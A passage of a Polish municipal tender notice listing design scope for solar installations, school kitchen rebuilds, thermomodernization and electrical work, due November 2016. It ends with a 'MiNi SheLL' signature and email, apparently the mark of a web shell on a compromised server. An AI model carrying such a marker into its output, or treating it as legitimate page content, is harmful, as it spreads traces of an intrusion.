projekt branżowy instalacji solarnej wraz z kolektorami słonecznymi dla wspomagania zasilania instalacji c.w.u w całym budynku (lokalizacja kolektorów słonecznych na dachu budynku) 
projekt branżowy automatyki instalacji solarnej
Branża elektryczna:
istniejącą instalację odgromową przystosować do nowych warunków pracy oraz    
obowiązujących przepisów i norm
charakterystyka robót
wykonać pomiary kontrolne rezystancji uziemienia
dokonać oceny stanu technicznego instalacji odgromowej
wymienić zwody pionowe ( min fi 8)
zwody poziome doprowadzić do należytego stanu technicznego
wymienić zaciski kontrolne
po analizie pomiarów - (ewentualnie) wymienić uziemienie otokowe lub 
zastosować sondy
zdemontować wszystkie oprawy zewnętrzne ( między innymi oświetlenia
ewakuacyjnego oraz urządzenia teletechniczne np. kamery monitoringu, anteny
odbiorcze, czujniki ruchu itp.) zamontowane na ścianach zewnętrznych budynku
po wykonaniu termomodernizacji wszystkie urządzenia (nowe) zamontować
ponownie  przystosowując je do obecnie obowiązujących przepisów i norm.  
Zakres do opracowania dot. przebudowy segmentu kuchennego wraz z przyległą komunikacją:
Wykonanie inwentaryzacji wielobranżowej wraz z oceną stanu technicznego części kuchennej. Ocena stanu technicznego powinna zawierać przede wszystkim informacje odnoście elementów wyburzanych (konstrukcyjne, nie konstrukcyjne) i jak będzie to miało wpływ na pozostałą cześć budynku oraz ekspertyzę dachu jeżeli miała by być na nim posadowiona centrala wentylacyjna,  klimatyzatory lub inne urządzenia.
Branża budowlano- technologiczna
Wykonanie dokumentacji projektowej wielobranżowej łącznie z jej technologią remontu wraz                              z przebudową kuchni z uwzględnieniem obowiązujących przepisów  i nowoczesnego sprzętu oraz:
zakładanej ilości 125 obiadów dziennie, 
ilość pracowników na kuchni 4 osoby
w kuchni należy zaprojektować okap kuchenny firmy Jeven
w pomieszczeniach należy zaprojektować wentylację mechaniczną z centralą z wymiennikiem krzyżowym, 
projekt nowych dźwigów windowych, lokalizacja w miejscu starych, dźwigi 
z drzwiami skrzydłowymi (wychylnymi) z możliwością wjazdu wózka kelnerskiego. 
komplet wyposażenia tzn wszystkie urządzenia, meble, drobne wyposażenie kuchni (np. garnki, patelnie, chochle itp.), kompletny serwis i sztućce
Zakres branży sanitarnej:
projekt branżowy instalacji rurowych kuchni i zaplecza (gaz, woda zimna, c.w.u. kan.san. kan. technologiczna, kan.deszcz. p.poż, centralne ogrzewanie, ciepło technologiczne dla central wentylacyjnych i klimatyzacyjnych) 
projekt branżowy wentylacji mechanicznej kuchni wraz z zapleczem
projekt branżowy automatyki wentylacji kuchni z zapleczem 
projekt branżowy instalacji alarmowej systemu detekcji gazu w kuchni 
projekt branżowy przyłącza kanalizacji sanitarnej oraz przyłącza kanalizacji technologicznej wraz z separatorem tłuszczu
projekt branżowy inwentaryzacji instalacji centralnego ogrzewania w całym obiekcie (w celu dokonania wyceny robót demontażowych)
Zakres branży elektrycznej:
zaprojektować nową rozdzielnicę zaplecza kuchennego ( RK )  wraz z przewodem zasilającym od rozdzielni głównej ( RG )  i przyłączeniem do głównej szyny uziemiającej  ( GSU )  oraz instalacje elektryczne n n 0,4 kV 
z  projektowanej rozdzielnicy ( RK ) wyprowadzić obwody elektryczne do   
obsługi zaplecza kuchennego:
instalacje oświetleniowe
instalacje gniazd wtykowych  0,23 kV ( jednofazowe )
instalacje gniazd wtykowych 0,4 kV ( trójfazowe )
instalacje elektryczne zasilające wentylacje
instalacje oświetlenia ewakuacyjnego i awaryjnego
zasilanie sterowania  systemowego wentylacji   
W ramach zadania należy:
przed przystąpieniem do projektu zasadniczego po zapoznaniu się ze szczegółowymi oczekiwaniami inwestora i użytkownika przedstawić 2 koncepcje rozwiązania technologicznego do akceptacji i dopiero po wyborze rozwiązania należy przystąpić do wykonywania projektu zasadniczego.
Projekt wykonawczy powinien uwzględniać między innymi:
poszczególne projekty branżowe oraz rysunki koordynacyjne złożeniowe wielobranżowe
wyszczególnienie wszystkich mebli i urządzeń z dokładnym opisem i rysunkiem
wykaz całego sprzętu z wszystkimi parametrami technicznymi
projekt ścian i podłóg w pomieszczeń gdzie przewidziano glazurę i terakotę
projekt wizualizacji pomieszczeń (Projektant po wcześniejszym uzgodnieniu 
z inwestorem i użytkownikiem  przedstawia 2 wizualizację do akceptacji, po wyborze rozwiązania wykonuje szczegółowe rysunki wykonawcze)
Szczegółowy zakres projektanta określony jest w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. ilość pobytów na budowie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III  Termomodernizacja Gimnazjum  Nr 1- dokumentacja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stan istniejący:
Budynek wzniesiono na początku XX w. Budynek o konstrukcji murowanej. Konstrukcja dachu drewniana, dach mansardowy kryty dachówką ceramiczną, ściany zewnętrzne ceglane
gr. 55 oraz 41 cm otynkowane. Od strony ulicy cokół obłożony okładziną kamienną, okna drewniane. Poddasze w części zaadaptowane w latach 90-tych na cele dydaktyczne, wymieniono stolarkę okienną na poddaszu oraz pokrycie dachowe.
Wytyczne ogólne:
Projekt winien obejmować    wykonanie inwentaryzacji  wraz z oceną stanu technicznego całego budynku oraz  wykonanie audytu energetycznego oraz efektywności ekologicznej.
Uwzględnić wykonanie przed zasadniczym projektem inwentaryzacji wielobranżowej                                                 z narysowanymi głównymi elementami oraz oceny stanu technicznego pod kątem planowanych prac
Przed wykonaniem zasadniczego projektu przedstawić koncepcję kolorystyki i uzgodnić                                           z Inwestorem. Zaakceptowana koncepcja jest podstawą do wykonania projektu zasadniczego.
Ujęty zakres prac musi być kompletny i tak opisany, żeby podczas wykonania prac budowlanych na podstawie projektu nie pojawiały się koszty dodatkowe
Projekt należy uzgodnić z Wojewódzkim Konserwatorem Zabytków we Wrocławiu, Delegatura                          w Legnicy.
Na płycie dołączonej do wersji papierowej załączyć:
rysunki i opisy w wersji edytowalnej (opisy otwierane w programie word, rysunki                                                      w formie dwg lub dxf dla wersji Autocad nie późniejszej niż 2010)
zeskanowany projekt z decyzji pozwolenia na budowę lub zgłoszenia  wraz z treścią decyzji, wszystkimi uzgodnieniami i projektami. Płyta powinna być dokładną kopią projektu który uzyskał pozwolenie na budowę- zeskanowane rysunki, opisy i uzgodnienia muszą być tożsame z przekazywaną wersją papierową oraz dokładną kopią projektu wykonawczego 
projekt wykonawczy powinien być doszczegółowieniem projektu budowlanego zatwierdzonego decyzjami pozwolenia na budowę lub zgłoszeniem. Elementy zawarte w projekcie wykonawczym nie mogą powodować zmian istotnych w stosunku do projektu budowlanego
Branża budowlana- roboty zewnętrzne:
od strony południowej i zachodniej wszystkie ściany do docieplenia 
od strony północnej i wschodniej docieplenie części obiektu
wyłączone z docieplenia następujące fragmenty:
elewacja północna w obrębie głównego zespołu wejściowego
część elewacji wschodniej z dużymi oknami
pas pionowy od strony północnej z balkonem oraz ozdobną attyką 
na nieocieplanej części wykonać fakturę bez docieplenia z odnowieniem                                i odtworzeniem detali
docieplenie ścian zewnętrznych wełną mineralną w systemie lekko mokrym
zachowanie istniejących detali architektonicznych oraz ich renowacja
istniejące cokoły z płyt kamiennych od strony północnej i wschodniej do piaskowani
renowacji
cokół od strony południowej i zachodniej ocieplić wełną mineralną w systemie lekko   mokrym i obłożyć płytami kamiennymi
parapety okienne zewnętrzne do wymiany na ceramiczne szkliwione
nad wejściami do budynku od strony południowej zaprojektować zadaszenia pokryte dachówką
przebudować dach nad częścią dobudowanych sanitariatów od strony południowej
przebudować schodów zewnętrznych od strony południowej wraz z likwidacją zbiornika 
p.pożarowego znajdującego się pod schodami
wymiana rynien PCV
wymiana przeciekających koszy
wymiana rur spustowych wraz z rewizjami
renowacja schodów przy wejściu głównym i elementów architektonicznych na elewacji  wraz z balkonem na elewacji północnej i elementami z metalu
wymiana starej stolarki okiennej wraz z oknem owalnym na strychu
wymiana stolarki okiennej w sali gimnastycznej
stare kraty okienne do wymiany na kute
ściany zewnętrzne wokół budynku poniżej poziomu terenu odkopać, osuszyć, wykonać 
izolację wodoszczelną i ocieplić. Przewidzieć taki sposób prowadzenia prac aby zachować w nienaruszonym stanie kamienny cokół
w wykopie wokół budynku przed zasypaniem ułożyć nowy otok instalacji odgromowej
Branża budowlana- roboty wewnętrzne:
po skuciu tynku ze ścian zewnętrznych w piwnicach, osuszeniu i wykonaniu tynków    renowacyjnych przewidzieć generalny remont piwnic
poddasze zaadaptowane w latach 90-tych na cele dydaktyczne z uwagi na niskie temperatury w okresach zimowych przewidzieć dodatkowe docieplenie stropów wraz z wykonaniem podłóg drewnianych na strychu
docieplenia wymaga pozostała część stropów poddaszy, również nad salą gimnastyczną wraz                                 z wykonaniem podłóg  
Branża budowlana- droga, chodniki, ogrodzenie
odtworzyć chodniki wokół budynku po wykonaniu termomodernizacji 
z uwagi na różnorodność nawierzchni drogi dojazdowej od strony zachodniej i placu od strony    południowej, zaprojektować nową nawierzchnię wraz z odwodnieniem oraz elementami małej architektury typu ławki, kosze na śmieci - wykonać jako odrębne zadanie dokumentacyjne z osobnymi decyzjami administracyjnymi wraz z kosztorysami, specyfikacjami, przedmiarami wg poniższego opisu
z uwagi na zły stan ogrodzenia wraz z cokołem od strony zachodniej, zaprojektować 
nowe pasujące do otoczenia - zakres niezbędny w powiązaniu z termomodernizowanym obiektem- wykonać jako odrębne zadanie dokumentacyjne z osobnymi decyzjami administracyjnymi wraz z kosztorysami, specyfikacjami, przedmiarami wg poniższego opisu
Branża elektryczna:
przebudowa instalacji odgromowej- zaprojektować nową instalację odgromową - przystosowaną do obecnie obowiązujących przepisów i norm - na budynku termomodernizowanym  będącym pod nadzorem konserwatorskim
wykonać pomiary kontrolne rezystancji uziemienia 
dokonać oceny stanu technicznego instalacji odgromowej
wymienić zwody pionowe ( min. fi 8 )
zwody poziome doprowadzić do należytego stanu technicznego
wymienić zaciski kontrolne
po analizie wyników pomiarów rezystancji uziemienia - ( ewentualnie ) wymienić  
uziemienie otokowe lub zastosować sondy
zdemontować wszystkie oprawy zewnętrzne ( między innymi oświetlenia    
ewakuacyjnego oraz urządzenia teletechniczne np. kamery monitoringu,   
anteny odbiorcze, czujniki ruchu itp.) zamontowane na ścianach   
zewnętrznych budynku 
po wykonaniu termomodernizacji  wszystkie urządzenia ( nowe ) zamontować    
ponownie - przystosowując je do obecnie obowiązujących przepisów i norm.
przeanalizowanie stanu instalacji elektrycznej w remontowanych piwnicach i 
doprojektowanie niezbędnych elementów
Szczegółowy zakres projektanta określony jest w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. ilość pobytów na budowie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV  SP Nr 12 - przebudowa segmentu żywieniowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wytyczne ogólne:
W ramach zamówienia wykonać inwentaryzację wielobranżową z narysowanymi głównymi elementami oraz oceny stanu technicznego pod kątem planowanych prac
Na płycie dołączonej do wersji papierowej załączyć:
rysunki i opisy w wersji edytowalnej (opisy otwierane w programie word, rysunki w formie dwg lub dxf dla wersji Autocad nie późniejszej niż 2010); kosztorysy w plikach ath. specyfikacje analogicznie do opisów 
zeskanowany projekt z decyzji pozwolenia na budowę lub zgłoszenia  wraz z treścią decyzji, wszystkimi uzgodnieniami i projektami. Płyta powinna być dokładną kopią projektu który uzyskał pozwolenie na budowę- zeskanowane rysunki, opisy i uzgodnienia muszą być tożsame z przekazywaną wersją papierową oraz dokładną kopią projektu wykonawczego 
Projekt wykonawczy powinien być doszczegółowieniem projektu budowlanego zatwierdzonego decyzjami pozwolenia na budowę lub zgłoszeniem. Elementy zawarte w projekcie wykonawczym nie mogą powodować zmian istotnych w stosunku do projektu budowlanego
Branża budowlana
Wykonanie inwentaryzacji wraz z oceną stanu technicznego skrzydła szkoły w której znajduje się segment żywieniowy wraz z jadalnią oraz świetlica na II piętrze. Ocena stanu technicznego powinna zawierać przede wszystkim informacje odnośnie elementów wyburzanych (konstrukcyjne czy nie konstrukcyjne) i jaki to będzie miało wpływ na pozostałą cześć budynku oraz ekspertyzę dachu jeżeli miała by być na nim posadowiona centrala wentylacyjna,  klimatyzatory lub inne urządzenia.
Uwaga:
W pomieszczeniu jadalni oraz w świetlicach należy tak uwzględnić trasy sieci oraz zakres prac aby nie zniszczyć istniejącej nowej wykładziny w jadalni oraz w jak najmniejszym stopniu zniszczyć pomieszczenia świetlicy. W pomieszczeniach gdzie będą wykonywane jakiekolwiek prace budowlane należy całe te pomieszczenia uwzględnić do odświeżenia.
Wykonanie dokumentacji projektowej wielobranżowej remontu wraz z przebudową segmentu kuchennego łącznie z technologią kuchni z uwzględnieniem obowiązujących przepisów i nowoczesnego sprzętu oraz:
zakładana ilość 450 obiadów dziennie, 
ilość pracowników na kuchni 7 osób + 1 intendent
w kuchni należy zaprojektować okap kuchenny firmy Jeven
w pomieszczeniach należy zaprojektować wentylację mechaniczną z odzyskiem ciepła z centralą                         z wymiennikiem krzyżowym oraz mechaniczną nawiewno- wywiewną zgodnie z wymaganiami,                         w jadalni klimatyzacją oraz zaprojektować prawidłową wymianę powietrza w świetlicy wraz                                     z chłodzeniem
projekt dwóch nowych dźwigów windowych, lokalizacja w miejscu starych, oba dźwigi z drzwiami skrzydłowymi (wychylnymi) z możliwością wjazdu wózka kelnerskiego. 
komplet wyposażenia tzn wszystkie urządzenia, meble, drobne wyposażenie kuchni (np. garnki, patelnie, chochle itp.), serwis i sztućce
Przed przystąpieniem do projektu zasadniczego po zapoznaniu się ze szczegółowymi oczekiwaniami inwestora i użytkownika przedstawić 2 koncepcje rozwiązania technologicznego do akceptacji i dopiero po wyborze rozwiązania należy przystąpić do wykonywania projektu zasadniczego. Zaakceptowana koncepcja jest podstawą do wykonywania projektu zasadniczego
Projekt wykonawczy powinien uwzględniać zakres między innymi:
wyszczególnienie wszystkich mebli z dokładnym opisem i rysunkiem
wykaz całego sprzętu z wszystkimi parametrami technicznymi
projekt ścian i podłóg w pomieszczeń gdzie przewidziano glazurę i terakotę
projekt wizualizacji pomieszczeń (Projektant po wcześniejszym uzgodnieniu z inwestorem                                          i użytkownikiem  przedstawia 2 wizualizację do akceptacji, po wyborze rozwiązania wykonuje szczegółowe rysunki wykonawcze)
rysunki koordynacyjne zawierające wszystkie branże 
Branża sanitarna:
Projekt branżowy inwentaryzacji instalacji sanitarnych oraz wentylacji  kuchni, zaplecza  i stołówki oraz świetlicy zlokalizowanej nad kuchnią - Projekt branżowy instalacji rurowych kuchni i zaplecza (gaz, woda zimna, c.w.u., kan.san., kan. technologiczna, kan.deszcz., p.poż, centralne ogrzewanie, ciepło technologiczne dla central wentylacyjnych i klimatyzacyjnych) 
Projekt branżowy wentylacji mechanicznej kuchni, zaplecza oraz świetlicy (lokalizacja      
centrali w obecnej wentylatorni zlokalizowanej w piwnicach lub na dachu budynku na podstawie konstrukcyjnej)
Projekt branżowy klimatyzacji stołówki (lokalizacja centrali w obecnej wentylatorni   zlokalizowanej      w piwnicach lub na dachu budynku na podstawie konstrukcyjnej) Projekt branżowy automatyki wentylacji kuchni z zapleczem oraz świetlicy
Projekt branżowy automatyki klimatyzacji stołówki
Projekt branżowy instalacji alarmowej systemu detekcji gazu w kuchni 
Projekt branżowy przyłącza kanalizacji sanitarnej oraz przyłącza kanalizacji technologicznej wraz             z separatorem tłuszczu
Projekt branżowy inwentaryzacji instalacji centralnego ogrzewania (w celu dokonania wyceny robót demontażowych) Projekt branżowy instalacji centralnego ogrzewania (należy przewidzieć obudowy dla grzejników w częściach komunikacyjnych oraz w świetlicy i stołówce)
Wykonanie dwóch koncepcji w/w instalacji (m.in. z wersją umieszczenia central wentylacyjnej                            i klimatyzacyjnej w obecnej wentylatorni lub drug wariant z umieszczeniem w/w central na dachu budynku na podstawach dachowych zgodnie z obliczeniami konstrukcyjnymi z uwzględnieniem odkrywek stropu na dachu budynku)
Branża elektryczna:
zaprojektować nową rozdzielnicę zaplecza kuchennego ( RK )  wraz z przewodem zasilającym od rozdzielni głównej ( RG )  i przyłączeniem do głównej szyny uziemiającej  
( GSU )  oraz instalacje elektryczne n/n 0,4 kV 
Z projektowanej rozdzielnicy ( RK ) wyprowadzić obwody elektryczne do  obsługi zaplecza kuchennego:
instalacje oświetleniowe
instalacje gniazd wtykowych  0,23 kV ( jednofazowe )
instalacje gniazd wtykowych 0,4 kV ( trójfazowe )
instalacje elektryczne zasilające wentylacje
instalacje oświetlenia ewakuacyjnego i awaryjnego
zasilanie sterowania  systemowego wentylacji   
Szczegółowy zakres projektanta określony jest w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. ilość pobytów na budowie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V Modernizacja segmentu żywieniowego PP Nr 6 - dokumentacja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wytyczne ogólnobudowlane:
Wykonanie inwentaryzacji wielobranżowej wraz z oceną stanu technicznego części kuchennej. Ocena stanu technicznego powinna zawierać przede wszystkim informacje odnoście elementów wyburzanych (konstrukcyjne, nie konstrukcyjne) i jak będzie to miało wpływ na pozostałą cześć budynku oraz ekspertyzę dachu jeżeli miała by być na nim posadowiona centrala wentylacyjna,  klimatyzatory lub inne urządzenia.
Wykonanie dokumentacji projektowej wielobranżowej łącznie z jej technologią remontu wraz                                 z przebudową kuchni z uwzględnieniem obowiązujących przepisów 
i nowoczesnego sprzętu oraz:
zakładanej ilości 125 obiadów dziennie, 
ilość pracowników na kuchni 4 osoby + 1 intendent
w kuchni należy zaprojektować okap kuchenny firmy Jeven
w pomieszczeniach należy zaprojektować wentylację mechaniczną z odzyskiem ciepła                                              z centralą z wymiennikiem krzyżowym, 
projekt nowych dźwigów windowych, lokalizacja w miejscu starych, dźwigi z drzwiami skrzydłowymi (wychylnymi) z możliwością wjazdu wózka kelnerskiego. 
komplet wyposażenia tzn wszystkie urządzenia, meble, drobne wyposażenie kuchni (np. garnki, patelnie, chochle itp.), kompletny serwis i sztućce
Zakres branży sanitarnej:
projekt branżowy instalacji rurowych kuchni i zaplecza (gaz, woda zimna, c.w.u., kan.san., kan. technologiczna, kan.deszcz., p.poż, centralne ogrzewanie, ciepło technologiczne dla central wentylacyjnych i klimatyzacyjnych) 
projekt branżowy wentylacji mechanicznej kuchni wraz z zapleczem
projekt branżowy automatyki wentylacji kuchni z zapleczem 
projekt branżowy instalacji alarmowej systemu detekcji gazu w kuchni 
projekt branżowy przyłącza kanalizacji sanitarnej oraz przyłącza kanalizacji technologicznej wraz                        z separatorem tłuszczu
projekt branżowy inwentaryzacji instalacji centralnego ogrzewania w całym obiekcie                                                    (w celu dokonania wyceny robót demontażowych)
Zakres branży elektrycznej:
zaprojektować nową rozdzielnicę zaplecza kuchennego ( RK )  wraz z przewodem zasilającym od rozdzielni głównej ( RG )  i przyłączeniem do głównej szyny uziemiającej ( GSU )  oraz instalacje elektryczne n n 0,4 kV 
z  projektowanej rozdzielnicy ( RK ) wyprowadzić obwody elektryczne do obsługi zaplecza kuchennego:
instalacje oświetleniowe
instalacje gniazd wtykowych  0,23 kV ( jednofazowe )
instalacje gniazd wtykowych 0,4 kV ( trójfazowe )
instalacje elektryczne zasilające wentylacje
instalacje oświetlenia ewakuacyjnego i awaryjnego
zasilanie sterowania  systemowego wentylacji   
Szczegółowy zakres projektanta określony jest w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. ilość pobytów na budowie - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com